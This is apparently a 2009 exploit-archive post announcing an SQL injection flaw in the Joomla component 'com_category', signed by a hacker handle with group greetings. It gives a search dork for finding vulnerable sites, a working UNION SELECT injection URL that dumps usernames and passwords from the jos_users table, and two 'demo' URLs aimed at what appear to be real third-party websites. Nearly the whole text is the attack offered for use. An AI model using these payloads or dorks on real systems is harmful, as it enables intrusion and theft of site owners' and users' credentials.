############################################################### # # # Joomla component 'com_category' SQL injection vulnerability # ############################################################### # ######## # #dork:inurl:"com_category" # ######## # # xploited by Prince_Pwn3r # # ######## # # contact: 2p0wn0rN0t2p0wn@gmail.com # ############################################################### +++++++ greetz to all p0wnbox.com members !!! +++++++ -------------------------------------------------------------------------------------- Vulnerable joomla component : com_category vulnerable parameter: "edit" ($_GET) ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Exploit : http://www.site.com/index.php?option=com_category&task=loadCategory&catid*=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users-- Demos : http://www.p.com.au/index.php?option=com_category&task=loadCategory&catid=-9999+AND+1=0+union+all+select%201,2,group_concat(username,0x3a,password),4,5+from+jos_users-- or http://ndsay.com/index.php?option=com_category&id=12&task=view&color=3&cat_id=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users-- *could be different (eg: view&color=3&cat_id=) # milw0rm.com [2009-07-11]
0 条评论。